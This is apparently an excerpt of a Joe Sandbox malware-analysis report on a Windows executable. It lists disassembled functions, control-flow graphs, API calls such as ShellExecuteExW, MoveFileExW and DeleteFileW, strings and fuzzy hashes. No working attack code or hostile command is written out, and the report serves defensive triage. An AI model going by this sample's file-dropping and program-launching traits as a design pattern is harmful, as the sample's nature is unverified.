                                                                                                                                  control_flow_graph 347 8bc73f-8bc757 call 8beb78 call 8bec50 352 8bd40d-8bd418 347->352 353 8bc75d-8bc787 call 8bb314 347->353 353->352 356 8bc78d-8bc792 353->356 357 8bc793-8bc7a1 356->357 358 8bc7a2-8bc7b7 call 8baf98 357->358 361 8bc7b9 358->361 362 8bc7bb-8bc7d0 call 8b1fbb 361->362 365 8bc7dd-8bc7e0 362->365 366 8bc7d2-8bc7d6 362->366 368 8bd3d9-8bd404 call 8bb314 365->368 369 8bc7e6 365->369 366->362 367 8bc7d8 366->367 367->368 368->357 380 8bd40a-8bd40c 368->380 371 8bca5f-8bca61 369->371 372 8bc9be-8bc9c0 369->372 373 8bc7ed-8bc7f0 369->373 374 8bca7c-8bca7e 369->374 371->368 375 8bca67-8bca77 SetWindowTextW 371->375 372->368 378 8bc9c6-8bc9d2 372->378 373->368 379 8bc7f6-8bc850 call 8ba64d call 8abdf3 call 8aa544 call 8aa67e call 8a6edb 373->379 374->368 377 8bca84-8bca8b 374->377 375->368 377->368 381 8bca91-8bcaaa 377->381 382 8bc9e6-8bc9eb 378->382 383 8bc9d4-8bc9e5 call 8c7686 378->383 435 8bc98f-8bc9a4 call 8aa5d1 379->435 380->352 385 8bcaac 381->385 386 8bcab2-8bcac0 call 8c3e13 381->386 389 8bc9ed-8bc9f3 382->389 390 8bc9f5-8bca00 call 8bb48e 382->390 383->382 385->386 386->368 403 8bcac6-8bcacf 386->403 394 8bca05-8bca07 389->394 390->394 397 8bca09-8bca10 call 8c3e13 394->397 398 8bca12-8bca32 call 8c3e13 call 8c3e3e 394->398 397->398 423 8bca4b-8bca4d 398->423 424 8bca34-8bca3b 398->424 407 8bcaf8-8bcafb 403->407 408 8bcad1-8bcad5 403->408 411 8bcb01-8bcb04 407->411 412 8bcbe0-8bcbee call 8b0602 407->412 408->411 414 8bcad7-8bcadf 408->414 416 8bcb11-8bcb2c 411->416 417 8bcb06-8bcb0b 411->417 427 8bcbf0-8bcc04 call 8c279b 412->427 414->368 420 8bcae5-8bcaf3 call 8b0602 414->420 436 8bcb2e-8bcb68 416->436 437 8bcb76-8bcb7d 416->437 417->412 417->416 420->427 423->368 426 8bca53-8bca5a call 8c3e2e 423->426 431 8bca3d-8bca3f 424->431 432 8bca42-8bca4a call 8c7686 424->432 426->368 446 8bcc11-8bcc62 call 8b0602 call 8bb1be GetDlgItem SetWindowTextW SendMessageW call 8c3e49 427->446 447 8bcc06-8bcc0a 427->447 431->432 432->423 453 8bc9aa-8bc9b9 call 8aa55a 435->453 454 8bc855-8bc869 SetFileAttributesW 435->454 470 8bcb6a 436->470 471 8bcb6c-8bcb6e 436->471 439 8bcbab-8bcbce call 8c3e13 * 2 437->439 440 8bcb7f-8bcb97 call 8c3e13 437->440 439->427 475 8bcbd0-8bcbde call 8b05da 439->475 440->439 457 8bcb99-8bcba6 call 8b05da 440->457 481 8bcc67-8bcc6b 446->481 447->446 452 8bcc0c-8bcc0e 447->452 452->446 453->368 459 8bc90f-8bc91f GetFileAttributesW 454->459 460 8bc86f-8bc8a2 call 8ab991 call 8ab690 call 8c3e13 454->460 457->439 459->435 468 8bc921-8bc930 DeleteFileW 459->468 491 8bc8b5-8bc8c3 call 8abdb4 460->491 492 8bc8a4-8bc8b3 call 8c3e13 460->492 468->435 474 8bc932-8bc935 468->474 470->471 471->437 478 8bc939-8bc965 call 8a4092 GetFileAttributesW 474->478 475->427 488 8bc937-8bc938 478->488 489 8bc967-8bc97d MoveFileW 478->489 481->368 485 8bcc71-8bcc85 SendMessageW 481->485 485->368 488->478 489->435 490 8bc97f-8bc989 MoveFileExW 489->490 490->435 491->453 497 8bc8c9-8bc908 call 8c3e13 call 8bfff0 491->497 492->491 492->497 497->459
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BC744
                                                                                                                                    • Part of subcall function 008BB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008BB3FB
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCA0A
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCA13
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008BCA71
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCAB3
                                                                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 008BCBFB
                                                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 008BCC36
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 008BCC46
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,008EA472), ref: 008BCC54
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008BCC7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                  • API String ID: 2804936435-312220925
                                                                                                                                  • Opcode ID: 3de27f76d1bdeda49c2f91db4f444c20572097a247398d9d6b2c2196c232ad8e
                                                                                                                                  • Instruction ID: 16cea80422ebf23296cdccb2d573cb15a8ccee8cbd4641a1bb366589964508d2
                                                                                                                                  • Opcode Fuzzy Hash: 3de27f76d1bdeda49c2f91db4f444c20572097a247398d9d6b2c2196c232ad8e
                                                                                                                                  • Instruction Fuzzy Hash: BFE163B2900219AADF25DBA4DC85EEE77BCFB05350F4081A6F609E3251EF749E448F61
                                                                                                                                  Function 008ADA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008ADA70
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008ADAAC
                                                                                                                                    • Part of subcall function 008AC29A: _wcslen.LIBCMT ref: 008AC2A2
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008B1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008ABAE9,00000000,?,?,?,00010424), ref: 008B1BA0
                                                                                                                                  • _wcslen.LIBCMT ref: 008ADDE9
                                                                                                                                  • __fprintf_l.LIBCMT ref: 008ADF1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                  • API String ID: 566448164-801612888
                                                                                                                                  • Opcode ID: 5460b32fd6fedde642be8a3187c442e80a42c55265cc42adea2d2d5fac413f6e
                                                                                                                                  • Instruction ID: 8f7dcda0a7f0f33e572b5af62335de3b065a0d82772c39bd7b5b367201f80373
                                                                                                                                  • Opcode Fuzzy Hash: 5460b32fd6fedde642be8a3187c442e80a42c55265cc42adea2d2d5fac413f6e
                                                                                                                                  • Instruction Fuzzy Hash: 6F32E071900218ABEF24EF68C841BEA77B4FF16314F40452AF906DBA81EBB1D985CB51
                                                                                                                                  Function 008BD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  • GetDlgItem.USER32(00000068,008FFCB8), ref: 008BD4E8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,008BAF07,00000001,?,?,008BB7B9,008D506C,008FFCB8,008FFCB8,00001000,00000000,00000000), ref: 008BD510
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BD51B
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BD529
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD53F
                                                                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008BD559
                                                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD59D
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008BD5AB
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD5BA
                                                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD5E1
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D43F4), ref: 008BD5F0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                  • String ID: \
                                                                                                                                  • API String ID: 3569833718-2967466578
                                                                                                                                  • Opcode ID: 73ccd00fa871cbfc58966e710d117410b1906aebbfe96bd6892e068fbf2067f7
                                                                                                                                  • Instruction ID: 81cbf61025f64f27ea29df1b4c8a5baee3b4788cf5f381ffbc60e917576e48d7
                                                                                                                                  • Opcode Fuzzy Hash: 73ccd00fa871cbfc58966e710d117410b1906aebbfe96bd6892e068fbf2067f7
                                                                                                                                  • Instruction Fuzzy Hash: F531C171149346BFE311DF249C4AFAB7FACFB86708F004508F551D62A0EB758A0497B6
                                                                                                                                  Function 008BD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 836 8bd78f-8bd7a7 call 8bec50 839 8bd9e8-8bd9f0 836->839 840 8bd7ad-8bd7b9 call 8c3e13 836->840 840->839 843 8bd7bf-8bd7e7 call 8bfff0 840->843 846 8bd7e9 843->846 847 8bd7f1-8bd7ff 843->847 846->847 848 8bd812-8bd818 847->848 849 8bd801-8bd804 847->849 850 8bd85b-8bd85e 848->850 851 8bd808-8bd80e 849->851 850->851 852 8bd860-8bd866 850->852 853 8bd810 851->853 854 8bd837-8bd844 851->854 857 8bd868-8bd86b 852->857 858 8bd86d-8bd86f 852->858 859 8bd822-8bd82c 853->859 855 8bd84a-8bd84e 854->855 856 8bd9c0-8bd9c2 854->856 862 8bd9c6 855->862 863 8bd854-8bd859 855->863 856->862 857->858 864 8bd882-8bd898 call 8ab92d 857->864 858->864 865 8bd871-8bd878 858->865 860 8bd81a-8bd820 859->860 861 8bd82e 859->861 860->859 866 8bd830-8bd833 860->866 861->854 869 8bd9cf 862->869 863->850 871 8bd89a-8bd8a7 call 8b1fbb 864->871 872 8bd8b1-8bd8bc call 8aa231 864->872 865->864 867 8bd87a 865->867 866->854 867->864 873 8bd9d6-8bd9d8 869->873 871->872 881 8bd8a9 871->881 882 8bd8d9-8bd8e6 ShellExecuteExW 872->882 883 8bd8be-8bd8d5 call 8ab6c4 872->883 876 8bd9da-8bd9dc 873->876 877 8bd9e7 873->877 876->877 880 8bd9de-8bd9e1 ShowWindow 876->880 877->839 880->877 881->872 882->877 885 8bd8ec-8bd8f9 882->885 883->882 887 8bd8fb-8bd902 885->887 888 8bd90c-8bd90e 885->888 887->888 889 8bd904-8bd90a 887->889 890 8bd910-8bd919 888->890 891 8bd925-8bd944 call 8bdc3b 888->891 889->888 892 8bd97b-8bd987 CloseHandle 889->892 890->891 897 8bd91b-8bd923 ShowWindow 890->897 891->892 905 8bd946-8bd94e 891->905 895 8bd989-8bd996 call 8b1fbb 892->895 896 8bd998-8bd9a6 892->896 895->869 895->896 896->873 898 8bd9a8-8bd9aa 896->898 897->891 898->873 902 8bd9ac-8bd9b2 898->902 902->873 904 8bd9b4-8bd9be 902->904 904->873 905->892 906 8bd950-8bd961 GetExitCodeProcess 905->906 906->892 907 8bd963-8bd96d 906->907 908 8bd96f 907->908 909 8bd974 907->909 908->909 909->892
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008BD7AE
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 008BD8DE
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 008BD91D
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 008BD959
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008BD97F
                                                                                                                                  • ShowWindow.USER32(?,00000001), ref: 008BD9E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                  • String ID: .exe$.inf
                                                                                                                                  • API String ID: 36480843-3750412487
                                                                                                                                  • Opcode ID: a9d3c4ae2c1946b185c9c44cebdaa606e2d4136a2d990eaab2f00fb983284e42
                                                                                                                                  • Instruction ID: fc14dff717a342eab285462189f6867ea2bd8bfaecb785fb4f2a5d0073953cf6
                                                                                                                                  • Opcode Fuzzy Hash: a9d3c4ae2c1946b185c9c44cebdaa606e2d4136a2d990eaab2f00fb983284e42
                                                                                                                                  • Instruction Fuzzy Hash: 4051AD70008384AAEB219B249844BEBBFE4FF46744F04482EE9C4DB3A1F7718989C752
                                                                                                                                  Function 008CA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 910 8ca95b-8ca974 911 8ca98a-8ca98f 910->911 912 8ca976-8ca986 call 8cef4c 910->912 914 8ca99c-8ca9c0 MultiByteToWideChar 911->914 915 8ca991-8ca999 911->915 912->911 919 8ca988 912->919 917 8ca9c6-8ca9d2 914->917 918 8cab53-8cab66 call 8bfbbc 914->918 915->914 920 8ca9d4-8ca9e5 917->920 921 8caa26 917->921 919->911 924 8caa04-8caa15 call 8c8e06 920->924 925 8ca9e7-8ca9f6 call 8d2010 920->925 923 8caa28-8caa2a 921->923 927 8cab48 923->927 928 8caa30-8caa43 MultiByteToWideChar 923->928 924->927 938 8caa1b 924->938 925->927 937 8ca9fc-8caa02 925->937 932 8cab4a-8cab51 call 8cabc3 927->932 928->927 931 8caa49-8caa5b call 8caf6c 928->931 940 8caa60-8caa64 931->940 932->918 939 8caa21-8caa24 937->939 938->939 939->923 940->927 942 8caa6a-8caa71 940->942 943 8caaab-8caab7 942->943 944 8caa73-8caa78 942->944 946 8caab9-8caaca 943->946 947 8cab03 943->947 944->932 945 8caa7e-8caa80 944->945 945->927 950 8caa86-8caaa0 call 8caf6c 945->950 948 8caacc-8caadb call 8d2010 946->948 949 8caae5-8caaf6 call 8c8e06 946->949 951 8cab05-8cab07 947->951 956 8cab41-8cab47 call 8cabc3 948->956 962 8caadd-8caae3 948->962 949->956 964 8caaf8 949->964 950->932 965 8caaa6 950->965 955 8cab09-8cab22 call 8caf6c 951->955 951->956 955->956 968 8cab24-8cab2b 955->968 956->927 967 8caafe-8cab01 962->967 964->967 965->927 967->951 969 8cab2d-8cab2e 968->969 970 8cab67-8cab6d 968->970 971 8cab2f-8cab3f WideCharToMultiByte 969->971 970->971 971->956 972 8cab6f-8cab76 call 8cabc3 971->972 972->932
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008C5695,008C5695,?,?,?,008CABAC,00000001,00000001,2DE85006), ref: 008CA9B5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008CABAC,00000001,00000001,2DE85006,?,?,?), ref: 008CAA3B
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008CAB35
                                                                                                                                  • __freea.LIBCMT ref: 008CAB42
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • __freea.LIBCMT ref: 008CAB4B
                                                                                                                                  • __freea.LIBCMT ref: 008CAB70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                  • Opcode ID: 1b5cf45ebf6008dbf5eb723f7562aad36d0253b7d2081ae76dd992bf7bb1c4f7
                                                                                                                                  • Instruction ID: 5c549cf878a55b41c43ce8c59146f733b9e9916925c5739a4b22a1fd05aa2bc1
                                                                                                                                  • Opcode Fuzzy Hash: 1b5cf45ebf6008dbf5eb723f7562aad36d0253b7d2081ae76dd992bf7bb1c4f7
                                                                                                                                  • Instruction Fuzzy Hash: CD51B17261021EABDB298F64CC45FABB7BAFB44B68F15462DFC04D6140DB34DC40D692
                                                                                                                                  Function 008C3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 975 8c3b72-8c3b7c 976 8c3bee-8c3bf1 975->976 977 8c3b7e-8c3b8c 976->977 978 8c3bf3 976->978 980 8c3b8e-8c3b91 977->980 981 8c3b95-8c3bb1 LoadLibraryExW 977->981 979 8c3bf5-8c3bf9 978->979 982 8c3c09-8c3c0b 980->982 983 8c3b93 980->983 984 8c3bfa-8c3c00 981->984 985 8c3bb3-8c3bbc GetLastError 981->985 982->979 987 8c3beb 983->987 984->982 986 8c3c02-8c3c03 FreeLibrary 984->986 988 8c3bbe-8c3bd3 call 8c6088 985->988 989 8c3be6-8c3be9 985->989 986->982 987->976 988->989 992 8c3bd5-8c3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,008C3C35,?,?,00902088,00000000,?,008C3D60,00000004,InitializeCriticalSectionEx,008D6394,InitializeCriticalSectionEx,00000000), ref: 008C3C03
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                                                  • Opcode ID: d4cdfe12645ba127616b366e63b74bc0f5d8a3f0108533fd4a12b23a6d396551
                                                                                                                                  • Instruction ID: 0995d79c877fad278adedb66d1b08887f76a2833fbe58c7c5d7d69a28f20e1cc
                                                                                                                                  • Opcode Fuzzy Hash: d4cdfe12645ba127616b366e63b74bc0f5d8a3f0108533fd4a12b23a6d396551
                                                                                                                                  • Instruction Fuzzy Hash: DD11C135A05625ABCB228B689C41F5D37B4FB05770F254229E851FB290E770EE018AD1
                                                                                                                                  Function 008BAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 008BAC2F
                                                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008BAC66
                                                                                                                                  • SHGetMalloc.SHELL32(008E8438), ref: 008BAC70
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                  • String ID: riched20.dll$3Ro
                                                                                                                                  • API String ID: 3498096277-3613677438
                                                                                                                                  • Opcode ID: fc0d738c5a23e9d744d93b08e842c2ad000edc7f99b1d83a604626772ee6bab8
                                                                                                                                  • Instruction ID: f30ce24d2b81871c6a50a02961dec9be8da466863944349e0005906358559129
                                                                                                                                  • Opcode Fuzzy Hash: fc0d738c5a23e9d744d93b08e842c2ad000edc7f99b1d83a604626772ee6bab8
                                                                                                                                  • Instruction Fuzzy Hash: B1F0F9B1900209AFCB50AFAAD8499EFFFFCFF84704F00415AA415F2251DBB856459FA1
                                                                                                                                  Function 008A98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 997 8a98e0-8a9901 call 8bec50 1000 8a990c 997->1000 1001 8a9903-8a9906 997->1001 1002 8a990e-8a991f 1000->1002 1001->1000 1003 8a9908-8a990a 1001->1003 1004 8a9921 1002->1004 1005 8a9927-8a9931 1002->1005 1003->1002 1004->1005 1006 8a9933 1005->1006 1007 8a9936-8a9943 call 8a6edb 1005->1007 1006->1007 1010 8a994b-8a996a CreateFileW 1007->1010 1011 8a9945 1007->1011 1012 8a99bb-8a99bf 1010->1012 1013 8a996c-8a998e GetLastError call 8abb03 1010->1013 1011->1010 1015 8a99c3-8a99c6 1012->1015 1016 8a99c8-8a99cd 1013->1016 1022 8a9990-8a99b3 CreateFileW GetLastError 1013->1022 1015->1016 1017 8a99d9-8a99de 1015->1017 1016->1017 1019 8a99cf 1016->1019 1020 8a99ff-8a9a10 1017->1020 1021 8a99e0-8a99e3 1017->1021 1019->1017 1024 8a9a2e-8a9a39 1020->1024 1025 8a9a12-8a9a2a call 8b0602 1020->1025 1021->1020 1023 8a99e5-8a99f9 SetFileTime 1021->1023 1022->1015 1026 8a99b5-8a99b9 1022->1026 1023->1020 1025->1024 1026->1015
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,008A7760,?,00000005,?,00000011), ref: 008A995F
